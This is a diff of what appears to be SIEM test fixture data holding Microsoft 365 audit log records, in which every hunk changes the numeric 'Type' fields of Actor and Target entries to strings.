@@ -3700,19 +3700,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3798,27 +3798,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3882,19 +3882,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -3980,27 +3980,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -4065,27 +4065,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4171,27 +4171,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4255,19 +4255,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4353,27 +4353,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -4437,19 +4437,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4535,27 +4535,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4619,19 +4619,19 @@ "Target": [ { "ID": "Application_08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "08d8bb01-c269-4a92-9929-a1a89b729512", - "Type": 2 + "Type": "2" }, { "ID": "Application", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4717,27 +4717,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -4802,27 +4802,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -4908,27 +4908,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5006,27 +5006,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -5112,27 +5112,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5210,27 +5210,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5316,27 +5316,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -5414,27 +5414,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5520,27 +5520,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5618,27 +5618,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -5724,27 +5724,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5822,27 +5822,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -5928,27 +5928,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -6026,27 +6026,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6132,27 +6132,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6230,27 +6230,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -6336,27 +6336,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6434,27 +6434,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6540,27 +6540,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -6641,27 +6641,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6747,27 +6747,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6848,27 +6848,27 @@ "Target": [ { "ID": "ServicePrincipal_5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "5c242833-909c-4c6b-bca3-50feaaa98d23", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "siem", - "Type": 1 + "Type": "1" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 2 + "Type": "2" }, { "ID": "71a0194b-b70c-44a6-82f2-d4670aee4585", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -6951,23 +6951,23 @@ "Actor": [ { "ID": "fim_password_service@support.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "100300008060F582", - "Type": 3 + "Type": "3" }, { "ID": "User_00000000-0000-0000-0000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000000-0000-0000-0000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "d51ef8df-6617-4356-b8d4-89ad7efef31e", 
@@ -7035,23 +7035,23 @@ "Target": [ { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" }, { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7123,27 +7123,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7221,27 +7221,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -7327,27 +7327,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7425,27 +7425,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7531,27 +7531,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -7629,27 +7629,27 @@ "Target": [ { "ID": "ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "98528ef9-e89b-469a-b19b-fa8e72a00fa6", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Microsoft Graph", - "Type": 1 + "Type": "1" }, { "ID": "00000003-0000-0000-c000-000000000000", - "Type": 2 + "Type": "2" }, { "ID": "00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7735,27 +7735,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -7833,27 +7833,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", 
@@ -7939,27 +7939,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": "18ed3507-a475-4ccb-b669-d66bc9f2a36e", - "Type": 2 + "Type": "2" }, { "ID": "User_755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "755e500a-6c03-46b0-b53b-282f23374e3b", - "Type": 2 + "Type": "2" }, { "ID": "User", - "Type": 2 + "Type": "2" } ], "ActorContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8037,27 +8037,27 @@ "Target": [ { "ID": "ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "efe101d0-818a-4f19-b2f8-53186f8218ad", - "Type": 2 + "Type": "2" }, { "ID": "ServicePrincipal", - "Type": 2 + "Type": "2" }, { "ID": "Office 365 Management APIs", - "Type": 1 + "Type": "1" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2", - "Type": 2 + "Type": "2" }, { "ID": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com", - "Type": 4 + "Type": "4" } ], "TargetContextId": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd", @@ -8143,27 +8143,27 @@ "Actor": [ { "ID": "asr@testsiem.onmicrosoft.com", - "Type": 5 + "Type": "5" }, { "ID": "1003200096971F55", - "Type": 3 + "Type": "3" }, { "ID": 